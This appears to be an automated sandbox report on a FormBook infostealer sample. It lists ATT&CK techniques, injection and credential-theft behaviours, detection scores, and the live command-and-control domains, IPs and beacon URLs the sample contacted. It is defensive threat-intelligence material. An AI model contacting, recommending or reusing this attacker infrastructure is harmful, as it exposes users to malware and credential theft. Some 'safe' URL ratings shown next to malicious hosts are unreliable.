                Source: Yara matchFile source: 00000008.00000002.4085165315.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets113
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588097 Sample: NFhRxwbegd.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 31 www.aziziyeescortg.xyz 2->31 33 www.zoomlive.live 2->33 35 12 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus detection for URL or domain 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 53 5 other signatures 2->53 10 NFhRxwbegd.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\user\AppData\...29FhRxwbegd.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 NFhRxwbegd.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 gsolWhsjddFW.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 ieUnatt.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 gsolWhsjddFW.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 appsolucao.shop 84.32.84.32, 64232, 64233, 64234 NTT-LT-ASLT Lithuania 23->37 39 www.happyjam.life 209.74.77.107, 64228, 64229, 64230 MULTIBAND-NEWHOPEUS United States 23->39 41 7 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                NFhRxwbegd.exe76%VirustotalBrowse
                NFhRxwbegd.exe79%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                NFhRxwbegd.exe100%AviraHEUR/AGEN.1305388
                NFhRxwbegd.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://www.muasamgiare.click/bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN100%Avira URL Cloudmalware
                http://www.aziziyeescortg.xyz0%Avira URL Cloudsafe
                https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd0%Avira URL Cloudsafe
                http://www.kkpmoneysocial.top/86am/?bJMLqbS=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6bu8d3TmiM5UZa33tCVJhgbgr0dm7+Mwsdmgoa6VRIc03dgAyFEL2o=&xHrti=IpSlbxE0jR0%Avira URL Cloudsafe
                http://www.muasamgiare.click/bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&xHrti=IpSlbxE0jR100%Avira URL Cloudmalware
                https://moneyeasilylso.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==0%Avira URL Cloudsafe
                http://www.happyjam.life/4t49/?bJMLqbS=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs=&xHrti=IpSlbxE0jR100%Avira URL Cloudmalware
                http://www.dietcoffee.online/725g/0%Avira URL Cloudsafe
                http://www.guacamask.online/v2ut/0%Avira URL Cloudsafe
                http://www.aziziyeescortg.xyz/2pcx/0%Avira URL Cloudsafe
                http://www.zoomlive.live/k6vm/?xHrti=IpSlbxE0jR&bJMLqbS=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEnvFfogATAKvfKf2eq3ZcSrhy/qdqLc/JYZ8TgWJuF+1kS7eDlOqY=0%Avira URL Cloudsafe
                http://www.123hellodrive.shop/vc3u/?bJMLqbS=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&xHrti=IpSlbxE0jR100%Avira URL Cloudmalware
                http://www.zoomlive.live/k6vm/0%Avira URL Cloudsafe
                https://moneyeasilysfl.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==0%Avira URL Cloudsafe
                http://www.muasamgiare.click/bsye/100%Avira URL Cloudmalware
                http://www.kkpmoneysocial.top/86am/0%Avira URL Cloudsafe
                http://www.appsolucao.shop/qt4m/100%Avira URL Cloudmalware
                http://www.appsolucao.shop/qt4m/?bJMLqbS=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&xHrti=IpSlbxE0jR100%Avira URL Cloudmalware
                http://www.123hellodrive.shop/vc3u/100%Avira URL Cloudmalware
                http://www.dietcoffee.online/725g/?bJMLqbS=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGjzQZh9bjjklx+lq67asD3Aqsp6I0O3QatHKxujksh8AYT18lk1s=&xHrti=IpSlbxE0jR0%Avira URL Cloudsafe
                http://www.7261ltajbc.bond/vt4e/?bJMLqbS=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+Rpmij5Ffq0kXSJKVYpR6npO/nbInFwrm8n/2iwd1ApVHfxnTP7ZY=&xHrti=IpSlbxE0jR0%Avira URL Cloudsafe
                http://www.happyjam.life/4t49/100%Avira URL Cloudmalware
                https://moneyeasilyijy.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==0%Avira URL Cloudsafe
                https://moneyeasilyywe.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==0%Avira URL Cloudsafe
                https://www.kkpmoneysocial.top0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                123hellodrive.shop
                		84.32.84.32
                		truetrue
                  		unknown
                  www.aziziyeescortg.xyz
                  		104.21.80.1
                  		truetrue
                    		unknown
                    dns.ladipage.com
                    		18.139.62.226
                    		truefalse
                      		high
                      www.guacamask.online
                      		208.91.197.27
                      		truetrue
                        		unknown
                        www.zoomlive.live
                        		154.208.202.225
                        		truetrue
                          		unknown
                          www.kkpmoneysocial.top
                          		104.21.16.1
                          		truetrue
                            		unknown
                            www.dietcoffee.online
                            		77.68.64.45
                            		truefalse
                              		high
                              appsolucao.shop
                              		84.32.84.32
                              		truetrue
                                		unknown
                                www.7261ltajbc.bond
                                		154.12.28.184
                                		truetrue
                                  		unknown
                                  www.happyjam.life
                                  		209.74.77.107
                                  		truetrue
                                    		unknown
                                    www.muasamgiare.click
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.artkub.net
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.123hellodrive.shop
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.appsolucao.shop
                                          		unknown
                                          		unknownfalse
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.happyjam.life/4t49/?bJMLqbS=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs=&xHrti=IpSlbxE0jRtrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.kkpmoneysocial.top/86am/?bJMLqbS=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6bu8d3TmiM5UZa33tCVJhgbgr0dm7+Mwsdmgoa6VRIc03dgAyFEL2o=&xHrti=IpSlbxE0jRtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.dietcoffee.online/725g/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.guacamask.online/v2ut/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.aziziyeescortg.xyz/2pcx/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.muasamgiare.click/bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&xHrti=IpSlbxE0jRtrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.zoomlive.live/k6vm/?xHrti=IpSlbxE0jR&bJMLqbS=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEnvFfogATAKvfKf2eq3ZcSrhy/qdqLc/JYZ8TgWJuF+1kS7eDlOqY=true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.123hellodrive.shop/vc3u/?bJMLqbS=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&xHrti=IpSlbxE0jRtrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.zoomlive.live/k6vm/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.muasamgiare.click/bsye/true
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.appsolucao.shop/qt4m/?bJMLqbS=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&xHrti=IpSlbxE0jRtrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.123hellodrive.shop/vc3u/true
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.appsolucao.shop/qt4m/true
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.kkpmoneysocial.top/86am/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.dietcoffee.online/725g/?bJMLqbS=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGjzQZh9bjjklx+lq67asD3Aqsp6I0O3QatHKxujksh8AYT18lk1s=&xHrti=IpSlbxE0jRtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.7261ltajbc.bond/vt4e/?bJMLqbS=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+Rpmij5Ffq0kXSJKVYpR6npO/nbInFwrm8n/2iwd1ApVHfxnTP7ZY=&xHrti=IpSlbxE0jRtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.happyjam.life/4t49/true
                                            • Avira URL Cloud: malware
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://www.muasamgiare.click/bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvNieUnatt.exe, 00000008.00000002.4087201731.0000000005CD6000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.00000000033E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.aziziyeescortg.xyzgsolWhsjddFW.exe, 00000009.00000002.4087823404.0000000005337000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/chrome_newtabieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://dts.gnpge.comgsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://moneyeasilylso.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==ieUnatt.exe, 00000008.00000002.4087201731.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.networksolutions.com/ieUnatt.exe, 00000008.00000002.4087201731.00000000067D4000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vdieUnatt.exe, 00000008.00000002.4087201731.00000000067D4000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://moneyeasilysfl.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==ieUnatt.exe, 00000008.00000002.4087201731.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.ecosia.org/newtab/ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdfieUnatt.exe, 00000008.00000002.4087201731.00000000067D4000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://ac.ecosia.org/autocomplete?q=ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.kkpmoneysocial.topgsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://moneyeasilyijy.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==ieUnatt.exe, 00000008.00000002.4087201731.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://moneyeasilyywe.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==ieUnatt.exe, 00000008.00000002.4087201731.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    154.208.202.225
                                                                    		www.zoomlive.liveSeychelles
                                                                    		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                    77.68.64.45
                                                                    		www.dietcoffee.onlineUnited Kingdom
                                                                    		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                    104.21.16.1
                                                                    		www.kkpmoneysocial.topUnited States
                                                                    		13335CLOUDFLARENETUStrue
                                                                    209.74.77.107
                                                                    		www.happyjam.lifeUnited States
                                                                    		31744MULTIBAND-NEWHOPEUStrue
                                                                    18.139.62.226
                                                                    		dns.ladipage.comUnited States
                                                                    		16509AMAZON-02USfalse
                                                                    154.12.28.184
                                                                    		www.7261ltajbc.bondUnited States
                                                                    		174COGENT-174UStrue
                                                                    84.32.84.32
                                                                    		123hellodrive.shopLithuania
                                                                    		33922NTT-LT-ASLTtrue
                                                                    208.91.197.27
                                                                    		www.guacamask.onlineVirgin Islands (BRITISH)
                                                                    		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                    104.21.80.1
                                                                    		www.aziziyeescortg.xyzUnited States
                                                                    		13335CLOUDFLARENETUStrue

                                                                    General Information

                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1588097
                                                                    Start date and time:2025-01-10 21:29:16 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 9m 16s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Run name:Run with higher sleep bypass
                                                                    Number of analysed new started processes analysed:10
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:2
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:NFhRxwbegd.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:d26c248791d7c1347e8e21257ad5522c1e47e26e054a59bc61a50133e5d180d6.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@11/9
                                                                    EGA Information:
                                                                    • Successful, ratio: 75%
                                                                    HCA Information:
                                                                    • Successful, ratio: 95%
                                                                    • Number of executed functions: 131
                                                                    • Number of non-executed functions: 327
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 52.149.20.212
                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target gsolWhsjddFW.exe, PID 2948 because it is empty
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    No simulations

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    154.208.202.225ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                    • www.zoomlive.live/k6vm/
                                                                    77.68.64.45ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                    • www.dietcoffee.online/725g/
                                                                    RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                    • www.dietcoffee.online/ugyg/
                                                                    PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                    • www.dietcoffee.online/dm4p/
                                                                    NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • www.dietcoffee.online/ugyg/
                                                                    Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • www.dietcoffee.online/dm4p/
                                                                    Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                    • www.dietcoffee.online/dm4p/
                                                                    104.21.16.1JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                    209.74.77.107OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                                    • www.beyondfitness.live/2eo9/
                                                                    ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                    • www.happyjam.life/4t49/
                                                                    ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                    • www.learnwithus.site/a6qk/
                                                                    PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                    • www.beyondfitness.live/fbpt/
                                                                    DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                    • www.happyjam.life/4ii9/
                                                                    SRT68.exeGet hashmaliciousFormBookBrowse
                                                                    • www.liveplah.live/2bf0/
                                                                    UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                    • www.gadgetre.info/8q8w/
                                                                    PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                    • www.learnwithus.site/alu5/
                                                                    Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                    • www.learnwithus.site/alu5/
                                                                    SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                    • www.happyjam.life/4ii9/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    www.aziziyeescortg.xyzORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.77.71
                                                                    rPaymentAdviceNote_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.77.71
                                                                    SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • 188.114.96.3
                                                                    www.guacamask.onlineORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                    • 208.91.197.27
                                                                    PO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                                    • 208.91.197.27
                                                                    DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                    • 208.91.197.27
                                                                    dns.ladipage.comEIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.228.81.39
                                                                    bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                                    • 18.139.62.226
                                                                    KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.228.81.39
                                                                    Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.228.81.39
                                                                    ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.228.81.39
                                                                    ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                    • 18.139.62.226
                                                                    SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                    • 18.139.62.226
                                                                    CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.228.81.39
                                                                    MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.228.81.39
                                                                    QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.228.81.39
                                                                    www.zoomlive.liveORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.208.202.225
                                                                    www.kkpmoneysocial.topORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                    • 172.67.129.38
                                                                    DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 172.67.129.38

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    MULTIBAND-NEWHOPEUS9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.41
                                                                    OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.77.107
                                                                    J1VpshZJfm.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.42
                                                                    NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.42
                                                                    zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.42
                                                                    KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.77.109
                                                                    rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.40
